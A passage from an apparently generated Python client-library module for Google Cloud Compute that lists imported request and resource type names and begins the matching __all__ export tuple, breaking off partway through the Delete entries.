InsertPacketMirroringRequest,
InsertPublicAdvertisedPrefixeRequest,
InsertPublicDelegatedPrefixeRequest,
InsertRegionAutoscalerRequest,
InsertRegionBackendServiceRequest,
InsertRegionCommitmentRequest,
InsertRegionDiskRequest,
InsertRegionHealthCheckRequest,
InsertRegionHealthCheckServiceRequest,
InsertRegionInstanceGroupManagerRequest,
InsertRegionNetworkEndpointGroupRequest,
InsertRegionNotificationEndpointRequest,
InsertRegionSslCertificateRequest,
InsertRegionTargetHttpProxyRequest,
InsertRegionTargetHttpsProxyRequest,
InsertRegionUrlMapRequest,
InsertReservationRequest,
InsertResourcePolicyRequest,
InsertRouteRequest,
InsertRouterRequest,
InsertSecurityPolicyRequest,
InsertServiceAttachmentRequest,
InsertSslCertificateRequest,
InsertSslPolicyRequest,
InsertSubnetworkRequest,
InsertTargetGrpcProxyRequest,
InsertTargetHttpProxyRequest,
InsertTargetHttpsProxyRequest,
InsertTargetInstanceRequest,
InsertTargetPoolRequest,
InsertTargetSslProxyRequest,
InsertTargetTcpProxyRequest,
InsertTargetVpnGatewayRequest,
InsertUrlMapRequest,
InsertVpnGatewayRequest,
InsertVpnTunnelRequest,
Instance,
InstanceAggregatedList,
InstanceGroup,
InstanceGroupAggregatedList,
InstanceGroupList,
InstanceGroupManager,
InstanceGroupManagerActionsSummary,
InstanceGroupManagerAggregatedList,
InstanceGroupManagerAutoHealingPolicy,
InstanceGroupManagerList,
InstanceGroupManagersAbandonInstancesRequest,
InstanceGroupManagersApplyUpdatesRequest,
InstanceGroupManagersCreateInstancesRequest,
InstanceGroupManagersDeleteInstancesRequest,
InstanceGroupManagersDeletePerInstanceConfigsReq,
InstanceGroupManagersListErrorsResponse,
InstanceGroupManagersListManagedInstancesResponse,
InstanceGroupManagersListPerInstanceConfigsResp,
InstanceGroupManagersPatchPerInstanceConfigsReq,
InstanceGroupManagersRecreateInstancesRequest,
InstanceGroupManagersScopedList,
InstanceGroupManagersSetInstanceTemplateRequest,
InstanceGroupManagersSetTargetPoolsRequest,
InstanceGroupManagerStatus,
InstanceGroupManagerStatusStateful,
InstanceGroupManagerStatusStatefulPerInstanceConfigs,
InstanceGroupManagerStatusVersionTarget,
InstanceGroupManagersUpdatePerInstanceConfigsReq,
InstanceGroupManagerUpdatePolicy,
InstanceGroupManagerVersion,
InstanceGroupsAddInstancesRequest,
InstanceGroupsListInstances,
InstanceGroupsListInstancesRequest,
InstanceGroupsRemoveInstancesRequest,
InstanceGroupsScopedList,
InstanceGroupsSetNamedPortsRequest,
InstanceList,
InstanceListReferrers,
InstanceManagedByIgmError,
InstanceManagedByIgmErrorInstanceActionDetails,
InstanceManagedByIgmErrorManagedInstanceError,
InstanceMoveRequest,
InstanceProperties,
InstanceReference,
InstancesAddResourcePoliciesRequest,
InstancesGetEffectiveFirewallsResponse,
InstancesGetEffectiveFirewallsResponseEffectiveFirewallPolicy,
InstancesRemoveResourcePoliciesRequest,
InstancesScopedList,
InstancesSetLabelsRequest,
InstancesSetMachineResourcesRequest,
InstancesSetMachineTypeRequest,
InstancesSetMinCpuPlatformRequest,
InstancesSetServiceAccountRequest,
InstancesStartWithEncryptionKeyRequest,
InstanceTemplate,
InstanceTemplateList,
InstanceWithNamedPorts,
Int64RangeMatch,
Interconnect,
InterconnectAttachment,
InterconnectAttachmentAggregatedList,
InterconnectAttachmentList,
InterconnectAttachmentPartnerMetadata,
InterconnectAttachmentPrivateInfo,
InterconnectAttachmentsScopedList,
InterconnectCircuitInfo,
InterconnectDiagnostics,
InterconnectDiagnosticsARPEntry,
InterconnectDiagnosticsLinkLACPStatus,
InterconnectDiagnosticsLinkOpticalPower,
InterconnectDiagnosticsLinkStatus,
InterconnectList,
InterconnectLocation,
InterconnectLocationList,
InterconnectLocationRegionInfo,
InterconnectOutageNotification,
InterconnectsGetDiagnosticsResponse,
InvalidateCacheUrlMapRequest,
Items,
License,
LicenseCode,
LicenseCodeLicenseAlias,
LicenseResourceCommitment,
LicenseResourceRequirements,
LicensesListResponse,
ListAcceleratorTypesRequest,
ListAddressesRequest,
ListAssociationsFirewallPolicyRequest,
ListAutoscalersRequest,
ListAvailableFeaturesSslPoliciesRequest,
ListBackendBucketsRequest,
ListBackendServicesRequest,
ListDisksRequest,
ListDiskTypesRequest,
ListErrorsInstanceGroupManagersRequest,
ListErrorsRegionInstanceGroupManagersRequest,
ListExternalVpnGatewaysRequest,
ListFirewallPoliciesRequest,
ListFirewallsRequest,
ListForwardingRulesRequest,
ListGlobalAddressesRequest,
ListGlobalForwardingRulesRequest,
ListGlobalNetworkEndpointGroupsRequest,
ListGlobalOperationsRequest,
ListGlobalOrganizationOperationsRequest,
ListGlobalPublicDelegatedPrefixesRequest,
ListHealthChecksRequest,
ListImagesRequest,
ListInstanceGroupManagersRequest,
ListInstanceGroupsRequest,
ListInstancesInstanceGroupsRequest,
ListInstancesRegionInstanceGroupsRequest,
ListInstancesRequest,
ListInstanceTemplatesRequest,
ListInterconnectAttachmentsRequest,
ListInterconnectLocationsRequest,
ListInterconnectsRequest,
ListLicensesRequest,
ListMachineTypesRequest,
ListManagedInstancesInstanceGroupManagersRequest,
ListManagedInstancesRegionInstanceGroupManagersRequest,
ListNetworkEndpointGroupsRequest,
ListNetworkEndpointsGlobalNetworkEndpointGroupsRequest,
ListNetworkEndpointsNetworkEndpointGroupsRequest,
ListNetworksRequest,
ListNodeGroupsRequest,
ListNodesNodeGroupsRequest,
ListNodeTemplatesRequest,
ListNodeTypesRequest,
ListPacketMirroringsRequest,
ListPeeringRoutesNetworksRequest,
ListPerInstanceConfigsInstanceGroupManagersRequest,
ListPerInstanceConfigsRegionInstanceGroupManagersRequest,
ListPreconfiguredExpressionSetsSecurityPoliciesRequest,
ListPublicAdvertisedPrefixesRequest,
ListPublicDelegatedPrefixesRequest,
ListReferrersInstancesRequest,
ListRegionAutoscalersRequest,
ListRegionBackendServicesRequest,
ListRegionCommitmentsRequest,
ListRegionDisksRequest,
ListRegionDiskTypesRequest,
ListRegionHealthCheckServicesRequest,
ListRegionHealthChecksRequest,
ListRegionInstanceGroupManagersRequest,
ListRegionInstanceGroupsRequest,
ListRegionNetworkEndpointGroupsRequest,
ListRegionNotificationEndpointsRequest,
ListRegionOperationsRequest,
ListRegionsRequest,
ListRegionSslCertificatesRequest,
ListRegionTargetHttpProxiesRequest,
ListRegionTargetHttpsProxiesRequest,
ListRegionUrlMapsRequest,
ListReservationsRequest,
ListResourcePoliciesRequest,
ListRoutersRequest,
ListRoutesRequest,
ListSecurityPoliciesRequest,
ListServiceAttachmentsRequest,
ListSnapshotsRequest,
ListSslCertificatesRequest,
ListSslPoliciesRequest,
ListSubnetworksRequest,
ListTargetGrpcProxiesRequest,
ListTargetHttpProxiesRequest,
ListTargetHttpsProxiesRequest,
ListTargetInstancesRequest,
ListTargetPoolsRequest,
ListTargetSslProxiesRequest,
ListTargetTcpProxiesRequest,
ListTargetVpnGatewaysRequest,
ListUrlMapsRequest,
ListUsableSubnetworksRequest,
ListVpnGatewaysRequest,
ListVpnTunnelsRequest,
ListXpnHostsProjectsRequest,
ListZoneOperationsRequest,
ListZonesRequest,
LocalDisk,
LocationPolicy,
LocationPolicyLocation,
LogConfig,
LogConfigCloudAuditOptions,
LogConfigCounterOptions,
LogConfigCounterOptionsCustomField,
LogConfigDataAccessOptions,
MachineType,
MachineTypeAggregatedList,
MachineTypeList,
MachineTypesScopedList,
ManagedInstance,
ManagedInstanceInstanceHealth,
ManagedInstanceLastAttempt,
ManagedInstanceVersion,
Metadata,
MetadataFilter,
MetadataFilterLabelMatch,
MoveDiskProjectRequest,
MoveFirewallPolicyRequest,
MoveInstanceProjectRequest,
NamedPort,
Network,
NetworkEndpoint,
NetworkEndpointGroup,
NetworkEndpointGroupAggregatedList,
NetworkEndpointGroupAppEngine,
NetworkEndpointGroupCloudFunction,
NetworkEndpointGroupCloudRun,
NetworkEndpointGroupList,
NetworkEndpointGroupsAttachEndpointsRequest,
NetworkEndpointGroupsDetachEndpointsRequest,
NetworkEndpointGroupsListEndpointsRequest,
NetworkEndpointGroupsListNetworkEndpoints,
NetworkEndpointGroupsScopedList,
NetworkEndpointWithHealthStatus,
NetworkInterface,
NetworkList,
NetworkPeering,
NetworkRoutingConfig,
NetworksAddPeeringRequest,
NetworksGetEffectiveFirewallsResponse,
NetworksGetEffectiveFirewallsResponseEffectiveFirewallPolicy,
NetworksRemovePeeringRequest,
NetworksUpdatePeeringRequest,
NodeGroup,
NodeGroupAggregatedList,
NodeGroupAutoscalingPolicy,
NodeGroupList,
NodeGroupMaintenanceWindow,
NodeGroupNode,
NodeGroupsAddNodesRequest,
NodeGroupsDeleteNodesRequest,
NodeGroupsListNodes,
NodeGroupsScopedList,
NodeGroupsSetNodeTemplateRequest,
NodeTemplate,
NodeTemplateAggregatedList,
NodeTemplateList,
NodeTemplateNodeTypeFlexibility,
NodeTemplatesScopedList,
NodeType,
NodeTypeAggregatedList,
NodeTypeList,
NodeTypesScopedList,
NotificationEndpoint,
NotificationEndpointGrpcSettings,
NotificationEndpointList,
Operation,
OperationAggregatedList,
OperationList,
OperationsScopedList,
OutlierDetection,
PacketMirroring,
PacketMirroringAggregatedList,
PacketMirroringFilter,
PacketMirroringForwardingRuleInfo,
PacketMirroringList,
PacketMirroringMirroredResourceInfo,
PacketMirroringMirroredResourceInfoInstanceInfo,
PacketMirroringMirroredResourceInfoSubnetInfo,
PacketMirroringNetworkInfo,
PacketMirroringsScopedList,
PatchAutoscalerRequest,
PatchBackendBucketRequest,
PatchBackendServiceRequest,
PatchFirewallPolicyRequest,
PatchFirewallRequest,
PatchForwardingRuleRequest,
PatchGlobalForwardingRuleRequest,
PatchGlobalPublicDelegatedPrefixeRequest,
PatchHealthCheckRequest,
PatchImageRequest,
PatchInstanceGroupManagerRequest,
PatchInterconnectAttachmentRequest,
PatchInterconnectRequest,
PatchNetworkRequest,
PatchNodeGroupRequest,
PatchPacketMirroringRequest,
PatchPerInstanceConfigsInstanceGroupManagerRequest,
PatchPerInstanceConfigsRegionInstanceGroupManagerRequest,
PatchPublicAdvertisedPrefixeRequest,
PatchPublicDelegatedPrefixeRequest,
PatchRegionAutoscalerRequest,
PatchRegionBackendServiceRequest,
PatchRegionHealthCheckRequest,
PatchRegionHealthCheckServiceRequest,
PatchRegionInstanceGroupManagerRequest,
PatchRegionUrlMapRequest,
PatchRouterRequest,
PatchRuleFirewallPolicyRequest,
PatchRuleSecurityPolicyRequest,
PatchSecurityPolicyRequest,
PatchServiceAttachmentRequest,
PatchSslPolicyRequest,
PatchSubnetworkRequest,
PatchTargetGrpcProxyRequest,
PatchTargetHttpProxyRequest,
PatchTargetHttpsProxyRequest,
PatchUrlMapRequest,
PathMatcher,
PathRule,
PerInstanceConfig,
Policy,
PreconfiguredWafSet,
PreservedState,
PreservedStatePreservedDisk,
PreviewRouterRequest,
Project,
ProjectsDisableXpnResourceRequest,
ProjectsEnableXpnResourceRequest,
ProjectsGetXpnResources,
ProjectsListXpnHostsRequest,
ProjectsSetDefaultNetworkTierRequest,
PublicAdvertisedPrefix,
PublicAdvertisedPrefixList,
PublicAdvertisedPrefixPublicDelegatedPrefix,
PublicDelegatedPrefix,
PublicDelegatedPrefixAggregatedList,
PublicDelegatedPrefixesScopedList,
PublicDelegatedPrefixList,
PublicDelegatedPrefixPublicDelegatedSubPrefix,
Quota,
RawDisk,
RecreateInstancesInstanceGroupManagerRequest,
RecreateInstancesRegionInstanceGroupManagerRequest,
Reference,
Region,
RegionAutoscalerList,
RegionDisksAddResourcePoliciesRequest,
RegionDisksRemoveResourcePoliciesRequest,
RegionDisksResizeRequest,
RegionDiskTypeList,
RegionInstanceGroupList,
RegionInstanceGroupManagerDeleteInstanceConfigReq,
RegionInstanceGroupManagerList,
RegionInstanceGroupManagerPatchInstanceConfigReq,
RegionInstanceGroupManagersAbandonInstancesRequest,
RegionInstanceGroupManagersApplyUpdatesRequest,
RegionInstanceGroupManagersCreateInstancesRequest,
RegionInstanceGroupManagersDeleteInstancesRequest,
RegionInstanceGroupManagersListErrorsResponse,
RegionInstanceGroupManagersListInstanceConfigsResp,
RegionInstanceGroupManagersListInstancesResponse,
RegionInstanceGroupManagersRecreateRequest,
RegionInstanceGroupManagersSetTargetPoolsRequest,
RegionInstanceGroupManagersSetTemplateRequest,
RegionInstanceGroupManagerUpdateInstanceConfigReq,
RegionInstanceGroupsListInstances,
RegionInstanceGroupsListInstancesRequest,
RegionInstanceGroupsSetNamedPortsRequest,
RegionList,
RegionSetLabelsRequest,
RegionSetPolicyRequest,
RegionTargetHttpsProxiesSetSslCertificatesRequest,
RegionUrlMapsValidateRequest,
RemoveAssociationFirewallPolicyRequest,
RemoveHealthCheckTargetPoolRequest,
RemoveInstancesInstanceGroupRequest,
RemoveInstanceTargetPoolRequest,
RemovePeeringNetworkRequest,
RemoveResourcePoliciesDiskRequest,
RemoveResourcePoliciesInstanceRequest,
RemoveResourcePoliciesRegionDiskRequest,
RemoveRuleFirewallPolicyRequest,
RemoveRuleSecurityPolicyRequest,
RequestMirrorPolicy,
Reservation,
ReservationAffinity,
ReservationAggregatedList,
ReservationList,
ReservationsResizeRequest,
ReservationsScopedList,
ResetInstanceRequest,
ResizeDiskRequest,
ResizeInstanceGroupManagerRequest,
ResizeRegionDiskRequest,
ResizeRegionInstanceGroupManagerRequest,
ResizeReservationRequest,
ResourceCommitment,
ResourceGroupReference,
ResourcePoliciesScopedList,
ResourcePolicy,
ResourcePolicyAggregatedList,
ResourcePolicyDailyCycle,
ResourcePolicyGroupPlacementPolicy,
ResourcePolicyHourlyCycle,
ResourcePolicyInstanceSchedulePolicy,
ResourcePolicyInstanceSchedulePolicySchedule,
ResourcePolicyList,
ResourcePolicyResourceStatus,
ResourcePolicyResourceStatusInstanceSchedulePolicyStatus,
ResourcePolicySnapshotSchedulePolicy,
ResourcePolicySnapshotSchedulePolicyRetentionPolicy,
ResourcePolicySnapshotSchedulePolicySchedule,
ResourcePolicySnapshotSchedulePolicySnapshotProperties,
ResourcePolicyWeeklyCycle,
ResourcePolicyWeeklyCycleDayOfWeek,
Route,
RouteAsPath,
RouteList,
Router,
RouterAdvertisedIpRange,
RouterAggregatedList,
RouterBgp,
RouterBgpPeer,
RouterBgpPeerBfd,
RouterInterface,
RouterList,
RouterNat,
RouterNatLogConfig,
RouterNatRule,
RouterNatRuleAction,
RouterNatSubnetworkToNat,
RoutersPreviewResponse,
RoutersScopedList,
RouterStatus,
RouterStatusBgpPeerStatus,
RouterStatusNatStatus,
RouterStatusNatStatusNatRuleStatus,
RouterStatusResponse,
Rule,
ScalingScheduleStatus,
Scheduling,
SchedulingNodeAffinity,
ScratchDisks,
Screenshot,
SecurityPoliciesListPreconfiguredExpressionSetsResponse,
SecurityPoliciesWafConfig,
SecurityPolicy,
SecurityPolicyAdaptiveProtectionConfig,
SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfig,
SecurityPolicyAdvancedOptionsConfig,
SecurityPolicyList,
SecurityPolicyReference,
SecurityPolicyRule,
SecurityPolicyRuleMatcher,
SecurityPolicyRuleMatcherConfig,
SecuritySettings,
SendDiagnosticInterruptInstanceRequest,
SendDiagnosticInterruptInstanceResponse,
SerialPortOutput,
ServerBinding,
ServiceAccount,
ServiceAttachment,
ServiceAttachmentAggregatedList,
ServiceAttachmentConnectedEndpoint,
ServiceAttachmentConsumerProjectLimit,
ServiceAttachmentList,
ServiceAttachmentsScopedList,
SetBackendServiceTargetSslProxyRequest,
SetBackendServiceTargetTcpProxyRequest,
SetBackupTargetPoolRequest,
SetCommonInstanceMetadataProjectRequest,
SetDefaultNetworkTierProjectRequest,
SetDeletionProtectionInstanceRequest,
SetDiskAutoDeleteInstanceRequest,
SetIamPolicyDiskRequest,
SetIamPolicyFirewallPolicyRequest,
SetIamPolicyImageRequest,
SetIamPolicyInstanceRequest,
SetIamPolicyInstanceTemplateRequest,
SetIamPolicyLicenseRequest,
SetIamPolicyNodeGroupRequest,
SetIamPolicyNodeTemplateRequest,
SetIamPolicyRegionDiskRequest,
SetIamPolicyReservationRequest,
SetIamPolicyResourcePolicyRequest,
SetIamPolicyServiceAttachmentRequest,
SetIamPolicySnapshotRequest,
SetIamPolicySubnetworkRequest,
SetInstanceTemplateInstanceGroupManagerRequest,
SetInstanceTemplateRegionInstanceGroupManagerRequest,
SetLabelsDiskRequest,
SetLabelsExternalVpnGatewayRequest,
SetLabelsForwardingRuleRequest,
SetLabelsGlobalForwardingRuleRequest,
SetLabelsImageRequest,
SetLabelsInstanceRequest,
SetLabelsRegionDiskRequest,
SetLabelsSnapshotRequest,
SetLabelsVpnGatewayRequest,
SetMachineResourcesInstanceRequest,
SetMachineTypeInstanceRequest,
SetMetadataInstanceRequest,
SetMinCpuPlatformInstanceRequest,
SetNamedPortsInstanceGroupRequest,
SetNamedPortsRegionInstanceGroupRequest,
SetNodeTemplateNodeGroupRequest,
SetPrivateIpGoogleAccessSubnetworkRequest,
SetProxyHeaderTargetSslProxyRequest,
SetProxyHeaderTargetTcpProxyRequest,
SetQuicOverrideTargetHttpsProxyRequest,
SetSchedulingInstanceRequest,
SetSecurityPolicyBackendServiceRequest,
SetServiceAccountInstanceRequest,
SetShieldedInstanceIntegrityPolicyInstanceRequest,
SetSslCertificatesRegionTargetHttpsProxyRequest,
SetSslCertificatesTargetHttpsProxyRequest,
SetSslCertificatesTargetSslProxyRequest,
SetSslPolicyTargetHttpsProxyRequest,
SetSslPolicyTargetSslProxyRequest,
SetTagsInstanceRequest,
SetTargetForwardingRuleRequest,
SetTargetGlobalForwardingRuleRequest,
SetTargetPoolsInstanceGroupManagerRequest,
SetTargetPoolsRegionInstanceGroupManagerRequest,
SetUrlMapRegionTargetHttpProxyRequest,
SetUrlMapRegionTargetHttpsProxyRequest,
SetUrlMapTargetHttpProxyRequest,
SetUrlMapTargetHttpsProxyRequest,
SetUsageExportBucketProjectRequest,
ShieldedInstanceConfig,
ShieldedInstanceIdentity,
ShieldedInstanceIdentityEntry,
ShieldedInstanceIntegrityPolicy,
SignedUrlKey,
SimulateMaintenanceEventInstanceRequest,
Snapshot,
SnapshotList,
SourceInstanceParams,
SslCertificate,
SslCertificateAggregatedList,
SslCertificateList,
SslCertificateManagedSslCertificate,
SslCertificateSelfManagedSslCertificate,
SslCertificatesScopedList,
SSLHealthCheck,
SslPoliciesList,
SslPoliciesListAvailableFeaturesResponse,
SslPolicy,
SslPolicyReference,
StartInstanceRequest,
StartWithEncryptionKeyInstanceRequest,
StatefulPolicy,
StatefulPolicyPreservedState,
StatefulPolicyPreservedStateDiskDevice,
StopInstanceRequest,
Subnetwork,
SubnetworkAggregatedList,
SubnetworkList,
SubnetworkLogConfig,
SubnetworkSecondaryRange,
SubnetworksExpandIpCidrRangeRequest,
SubnetworksScopedList,
SubnetworksSetPrivateIpGoogleAccessRequest,
Subsetting,
SwitchToCustomModeNetworkRequest,
Tags,
TargetGrpcProxy,
TargetGrpcProxyList,
TargetHttpProxiesScopedList,
TargetHttpProxy,
TargetHttpProxyAggregatedList,
TargetHttpProxyList,
TargetHttpsProxiesScopedList,
TargetHttpsProxiesSetQuicOverrideRequest,
TargetHttpsProxiesSetSslCertificatesRequest,
TargetHttpsProxy,
TargetHttpsProxyAggregatedList,
TargetHttpsProxyList,
TargetInstance,
TargetInstanceAggregatedList,
TargetInstanceList,
TargetInstancesScopedList,
TargetPool,
TargetPoolAggregatedList,
TargetPoolInstanceHealth,
TargetPoolList,
TargetPoolsAddHealthCheckRequest,
TargetPoolsAddInstanceRequest,
TargetPoolsRemoveHealthCheckRequest,
TargetPoolsRemoveInstanceRequest,
TargetPoolsScopedList,
TargetReference,
TargetSslProxiesSetBackendServiceRequest,
TargetSslProxiesSetProxyHeaderRequest,
TargetSslProxiesSetSslCertificatesRequest,
TargetSslProxy,
TargetSslProxyList,
TargetTcpProxiesSetBackendServiceRequest,
TargetTcpProxiesSetProxyHeaderRequest,
TargetTcpProxy,
TargetTcpProxyList,
TargetVpnGateway,
TargetVpnGatewayAggregatedList,
TargetVpnGatewayList,
TargetVpnGatewaysScopedList,
TCPHealthCheck,
TestFailure,
TestIamPermissionsDiskRequest,
TestIamPermissionsExternalVpnGatewayRequest,
TestIamPermissionsFirewallPolicyRequest,
TestIamPermissionsImageRequest,
TestIamPermissionsInstanceRequest,
TestIamPermissionsInstanceTemplateRequest,
TestIamPermissionsLicenseCodeRequest,
TestIamPermissionsLicenseRequest,
TestIamPermissionsNetworkEndpointGroupRequest,
TestIamPermissionsNodeGroupRequest,
TestIamPermissionsNodeTemplateRequest,
TestIamPermissionsPacketMirroringRequest,
TestIamPermissionsRegionDiskRequest,
TestIamPermissionsReservationRequest,
TestIamPermissionsResourcePolicyRequest,
TestIamPermissionsServiceAttachmentRequest,
TestIamPermissionsSnapshotRequest,
TestIamPermissionsSubnetworkRequest,
TestIamPermissionsVpnGatewayRequest,
TestPermissionsRequest,
TestPermissionsResponse,
Uint128,
UpdateAccessConfigInstanceRequest,
UpdateAutoscalerRequest,
UpdateBackendBucketRequest,
UpdateBackendServiceRequest,
UpdateDisplayDeviceInstanceRequest,
UpdateFirewallRequest,
UpdateHealthCheckRequest,
UpdateInstanceRequest,
UpdateNetworkInterfaceInstanceRequest,
UpdatePeeringNetworkRequest,
UpdatePerInstanceConfigsInstanceGroupManagerRequest,
UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest,
UpdateRegionAutoscalerRequest,
UpdateRegionBackendServiceRequest,
UpdateRegionHealthCheckRequest,
UpdateRegionUrlMapRequest,
UpdateRouterRequest,
UpdateShieldedInstanceConfigInstanceRequest,
UpdateUrlMapRequest,
UrlMap,
UrlMapList,
UrlMapReference,
UrlMapsAggregatedList,
UrlMapsScopedList,
UrlMapsValidateRequest,
UrlMapsValidateResponse,
UrlMapTest,
UrlMapTestHeader,
UrlMapValidationResult,
UrlRewrite,
UsableSubnetwork,
UsableSubnetworksAggregatedList,
UsableSubnetworkSecondaryRange,
UsageExportLocation,
ValidateRegionUrlMapRequest,
ValidateUrlMapRequest,
VmEndpointNatMappings,
VmEndpointNatMappingsInterfaceNatMappings,
VmEndpointNatMappingsList,
VpnGateway,
VpnGatewayAggregatedList,
VpnGatewayList,
VpnGatewaysGetStatusResponse,
VpnGatewaysScopedList,
VpnGatewayStatus,
VpnGatewayStatusHighAvailabilityRequirementState,
VpnGatewayStatusTunnel,
VpnGatewayStatusVpnConnection,
VpnGatewayVpnGatewayInterface,
VpnTunnel,
VpnTunnelAggregatedList,
VpnTunnelList,
VpnTunnelsScopedList,
WafExpressionSet,
WafExpressionSetExpression,
WaitGlobalOperationRequest,
WaitRegionOperationRequest,
WaitZoneOperationRequest,
Warning,
Warnings,
WeightedBackendService,
XpnHostList,
XpnResourceId,
Zone,
ZoneList,
ZoneSetLabelsRequest,
ZoneSetPolicyRequest,
)
__all__ = (
"AbandonInstancesInstanceGroupManagerRequest",
"AbandonInstancesRegionInstanceGroupManagerRequest",
"AcceleratorConfig",
"Accelerators",
"AcceleratorType",
"AcceleratorTypeAggregatedList",
"AcceleratorTypeList",
"AcceleratorTypesScopedList",
"AccessConfig",
"AddAccessConfigInstanceRequest",
"AddAssociationFirewallPolicyRequest",
"AddHealthCheckTargetPoolRequest",
"AddInstancesInstanceGroupRequest",
"AddInstanceTargetPoolRequest",
"AddNodesNodeGroupRequest",
"AddPeeringNetworkRequest",
"AddResourcePoliciesDiskRequest",
"AddResourcePoliciesInstanceRequest",
"AddResourcePoliciesRegionDiskRequest",
"Address",
"AddressAggregatedList",
"AddressesScopedList",
"AddressList",
"AddRuleFirewallPolicyRequest",
"AddRuleSecurityPolicyRequest",
"AddSignedUrlKeyBackendBucketRequest",
"AddSignedUrlKeyBackendServiceRequest",
"AdvancedMachineFeatures",
"AggregatedListAcceleratorTypesRequest",
"AggregatedListAddressesRequest",
"AggregatedListAutoscalersRequest",
"AggregatedListBackendServicesRequest",
"AggregatedListDisksRequest",
"AggregatedListDiskTypesRequest",
"AggregatedListForwardingRulesRequest",
"AggregatedListGlobalOperationsRequest",
"AggregatedListHealthChecksRequest",
"AggregatedListInstanceGroupManagersRequest",
"AggregatedListInstanceGroupsRequest",
"AggregatedListInstancesRequest",
"AggregatedListInterconnectAttachmentsRequest",
"AggregatedListMachineTypesRequest",
"AggregatedListNetworkEndpointGroupsRequest",
"AggregatedListNodeGroupsRequest",
"AggregatedListNodeTemplatesRequest",
"AggregatedListNodeTypesRequest",
"AggregatedListPacketMirroringsRequest",
"AggregatedListPublicDelegatedPrefixesRequest",
"AggregatedListRegionCommitmentsRequest",
"AggregatedListReservationsRequest",
"AggregatedListResourcePoliciesRequest",
"AggregatedListRoutersRequest",
"AggregatedListServiceAttachmentsRequest",
"AggregatedListSslCertificatesRequest",
"AggregatedListSubnetworksRequest",
"AggregatedListTargetHttpProxiesRequest",
"AggregatedListTargetHttpsProxiesRequest",
"AggregatedListTargetInstancesRequest",
"AggregatedListTargetPoolsRequest",
"AggregatedListTargetVpnGatewaysRequest",
"AggregatedListUrlMapsRequest",
"AggregatedListVpnGatewaysRequest",
"AggregatedListVpnTunnelsRequest",
"AliasIpRange",
"AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDisk",
"AllocationSpecificSKUAllocationReservedInstanceProperties",
"AllocationSpecificSKUReservation",
"Allowed",
"ApplyUpdatesToInstancesInstanceGroupManagerRequest",
"ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest",
"AttachDiskInstanceRequest",
"AttachedDisk",
"AttachedDiskInitializeParams",
"AttachNetworkEndpointsGlobalNetworkEndpointGroupRequest",
"AttachNetworkEndpointsNetworkEndpointGroupRequest",
"AuditConfig",
"AuditLogConfig",
"AuthorizationLoggingOptions",
"Autoscaler",
"AutoscalerAggregatedList",
"AutoscalerList",
"AutoscalersScopedList",
"AutoscalerStatusDetails",
"AutoscalingPolicy",
"AutoscalingPolicyCpuUtilization",
"AutoscalingPolicyCustomMetricUtilization",
"AutoscalingPolicyLoadBalancingUtilization",
"AutoscalingPolicyScaleInControl",
"AutoscalingPolicyScalingSchedule",
"Backend",
"BackendBucket",
"BackendBucketCdnPolicy",
"BackendBucketCdnPolicyBypassCacheOnRequestHeader",
"BackendBucketCdnPolicyNegativeCachingPolicy",
"BackendBucketList",
"BackendService",
"BackendServiceAggregatedList",
"BackendServiceCdnPolicy",
"BackendServiceCdnPolicyBypassCacheOnRequestHeader",
"BackendServiceCdnPolicyNegativeCachingPolicy",
"BackendServiceFailoverPolicy",
"BackendServiceGroupHealth",
"BackendServiceIAP",
"BackendServiceList",
"BackendServiceLogConfig",
"BackendServiceReference",
"BackendServicesScopedList",
"Binding",
"BulkInsertInstanceRequest",
"BulkInsertInstanceResource",
"BulkInsertInstanceResourcePerInstanceProperties",
"BulkInsertRegionInstanceRequest",
"CacheInvalidationRule",
"CacheKeyPolicy",
"CircuitBreakers",
"CloneRulesFirewallPolicyRequest",
"Commitment",
"CommitmentAggregatedList",
"CommitmentList",
"CommitmentsScopedList",
"Condition",
"ConfidentialInstanceConfig",
"ConnectionDraining",
"ConsistentHashLoadBalancerSettings",
"ConsistentHashLoadBalancerSettingsHttpCookie",
"CorsPolicy",
"CreateInstancesInstanceGroupManagerRequest",
"CreateInstancesRegionInstanceGroupManagerRequest",
"CreateSnapshotDiskRequest",
"CreateSnapshotRegionDiskRequest",
"CustomerEncryptionKey",
"CustomerEncryptionKeyProtectedDisk",
"Data",
"DeleteAccessConfigInstanceRequest",
"DeleteAddressRequest",
"DeleteAutoscalerRequest",
"DeleteBackendBucketRequest",
"DeleteBackendServiceRequest",
"DeleteDiskRequest",
"DeleteExternalVpnGatewayRequest",
"DeleteFirewallPolicyRequest",
"DeleteFirewallRequest",
"DeleteForwardingRuleRequest",
"DeleteGlobalAddressRequest",
"DeleteGlobalForwardingRuleRequest",
"DeleteGlobalNetworkEndpointGroupRequest",
"DeleteGlobalOperationRequest",
"DeleteGlobalOperationResponse",
"DeleteGlobalOrganizationOperationRequest",
"DeleteGlobalOrganizationOperationResponse",
"DeleteGlobalPublicDelegatedPrefixeRequest",
"DeleteHealthCheckRequest",
"DeleteImageRequest",
"DeleteInstanceGroupManagerRequest",
"DeleteInstanceGroupRequest",
"DeleteInstanceRequest",
"DeleteInstancesInstanceGroupManagerRequest",
"DeleteInstancesRegionInstanceGroupManagerRequest",
"DeleteInstanceTemplateRequest",
"DeleteInterconnectAttachmentRequest",
"DeleteInterconnectRequest",
"DeleteLicenseRequest",
"DeleteNetworkEndpointGroupRequest",
"DeleteNetworkRequest",
"DeleteNodeGroupRequest",
"DeleteNodesNodeGroupRequest",
"DeleteNodeTemplateRequest",
"DeletePacketMirroringRequest",
"DeletePerInstanceConfigsInstanceGroupManagerRequest",
"DeletePerInstanceConfigsRegionInstanceGroupManagerRequest",
"DeletePublicAdvertisedPrefixeRequest",
"DeletePublicDelegatedPrefixeRequest",
"DeleteRegionAutoscalerRequest",
"DeleteRegionBackendServiceRequest",
"DeleteRegionDiskRequest",
"DeleteRegionHealthCheckRequest",
"DeleteRegionHealthCheckServiceRequest",
"DeleteRegionInstanceGroupManagerRequest",
"DeleteRegionNetworkEndpointGroupRequest",
"DeleteRegionNotificationEndpointRequest",
"DeleteRegionOperationRequest",
"DeleteRegionOperationResponse",
"DeleteRegionSslCertificateRequest",
"DeleteRegionTargetHttpProxyRequest",
"DeleteRegionTargetHttpsProxyRequest",
"DeleteRegionUrlMapRequest",
"DeleteReservationRequest",
"DeleteResourcePolicyRequest",
"DeleteRouteRequest",
"DeleteRouterRequest",
"DeleteSecurityPolicyRequest",
"DeleteServiceAttachmentRequest",
